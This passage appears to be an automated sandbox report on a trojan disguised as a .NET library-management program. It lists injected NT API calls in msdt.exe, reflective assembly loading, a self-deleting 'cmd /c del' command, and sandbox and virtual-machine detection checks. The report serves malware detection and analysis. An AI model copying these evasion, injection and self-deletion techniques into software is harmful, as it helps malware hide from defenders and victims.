          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9670 NtQueryInformationProcess,18_2_04CE9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9610 NtEnumerateValueKey,18_2_04CE9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE97A0 NtUnmapViewOfSection,18_2_04CE97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9760 NtOpenProcess,18_2_04CE9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA770 NtOpenThread,18_2_04CEA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9770 NtSetInformationFile,18_2_04CE9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA710 NtOpenProcessToken,18_2_04CEA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9730 NtQueryVirtualMemory,18_2_04CE9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE98F0 NtReadVirtualMemory,18_2_04CE98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE98A0 NtWriteVirtualMemory,18_2_04CE98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEB040 NtSuspendThread,18_2_04CEB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9820 NtEnumerateKey,18_2_04CE9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE99D0 NtCreateProcessEx,18_2_04CE99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9950 NtQueueApcThread,18_2_04CE9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A80 NtOpenDirectoryObject,18_2_04CE9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A00 NtProtectVirtualMemory,18_2_04CE9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A10 NtQuerySection,18_2_04CE9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A20 NtResumeThread,18_2_04CE9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEA3B0 NtGetContextThread,18_2_04CEA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9B00 NtSetValueKey,18_2_04CE9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E85F0 NtCreateFile,18_2_008E85F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E86A0 NtReadFile,18_2_008E86A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E87D0 NtAllocateVirtualMemory,18_2_008E87D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E8720 NtClose,18_2_008E8720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E869A NtReadFile,18_2_008E869A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E87CA NtAllocateVirtualMemory,18_2_008E87CA
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.253365121.00000000011E9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.257531563.00000000061E0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.257392561.0000000005CB0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000000.241151855.0000000000AF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000000.248672814.00000000004C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316078938.000000000133F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exeBinary or memory string: OriginalFilenameInAttribu.exe. vs S9yf6BkjhTQUbHE.exe
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: S9yf6BkjhTQUbHE.exeReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile read: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe:Zone.IdentifierJump to behavior
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\S9yf6BkjhTQUbHE.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@13/2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addbook.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addbook.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addcustomer.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addcustomer.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addbook.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addcustomer.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: views/addbook.baml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: /InAttribu;component/views/addcustomer.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: O/InAttribu;component/views/addbook.xamle/InAttribu;component/views/borrowfrombookview.xaml[/InAttribu;component/views/borrowingview.xamlU/InAttribu;component/views/changebook.xaml]/InAttribu;component/views/changecustomer.xamlY/InAttribu;component/views/customerview.xaml]/InAttribu;component/views/deletecustomer.xamlS/InAttribu;component/views/errorview.xamlW/InAttribu;component/views/smallextras.xamlW/InAttribu;component/views/addcustomer.xaml
          Source: S9yf6BkjhTQUbHE.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: S9yf6BkjhTQUbHE.exe, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315540875.00000000011AF000.00000040.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp, msdt.exe, 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: S9yf6BkjhTQUbHE.exe, 00000001.00000002.316216528.00000000013C0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: S9yf6BkjhTQUbHE.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.S9yf6BkjhTQUbHE.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.S9yf6BkjhTQUbHE.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.S9yf6BkjhTQUbHE.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.S9yf6BkjhTQUbHE.exe.450000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A86F9A push 00000018h; retf 0_2_00A8715A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A892F5 push ds; ret 0_2_00A89340
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A89361 push ds; retf 0_2_00A89364
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_00A89347 push ds; ret 0_2_00A8934C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_055256E0 push esp; iretd 0_2_055256E9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B832 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B83B push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B89C push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041533E push esp; ret 1_2_0041533F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041B7E5 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004592F5 push ds; ret 1_2_00459340
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00459347 push ds; ret 1_2_0045934C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00459361 push ds; retf 1_2_00459364
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00456F9A push 00000018h; retf 1_2_0045715A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0110D0D1 push ecx; ret 1_2_0110D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CFD0D1 push ecx; ret 18_2_04CFD0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB89C push eax; ret 18_2_008EB8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB83B push eax; ret 18_2_008EB8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB832 push eax; ret 18_2_008EB838
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E533E push esp; ret 18_2_008E533F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB7E5 push eax; ret 18_2_008EB838
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85954100497

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.S9yf6BkjhTQUbHE.exe.2fe8e70.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.S9yf6BkjhTQUbHE.exe.307aecc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: S9yf6BkjhTQUbHE.exe PID: 6344, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000008D8614 second address: 00000000008D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000008D89AE second address: 00000000008D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239859s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6392Thread sleep count: 1268 > 30Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6392Thread sleep count: 928 > 30Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239732s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6348Thread sleep time: -30583s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239623s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239512s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239170s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239046s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238903s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238531s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238421s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238311s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238203s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237906s >= -30000sJump to behavior
